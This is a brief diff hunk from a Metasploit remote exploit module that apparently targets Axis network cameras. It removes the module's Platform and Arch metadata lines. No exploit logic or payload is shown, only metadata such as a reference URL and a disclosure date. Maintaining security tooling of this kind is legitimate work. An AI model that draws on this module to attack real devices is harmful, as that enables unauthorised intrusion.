@@ -38,8 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.axis.com/support/developer-support/axis-camera-application-platform']
         ],
         'DisclosureDate' => '2018-04-12',
-        'Platform' => ['linux'],
-        'Arch' => [ARCH_ARMLE],
         'Privileged' => true,
         'Targets' => [
           [
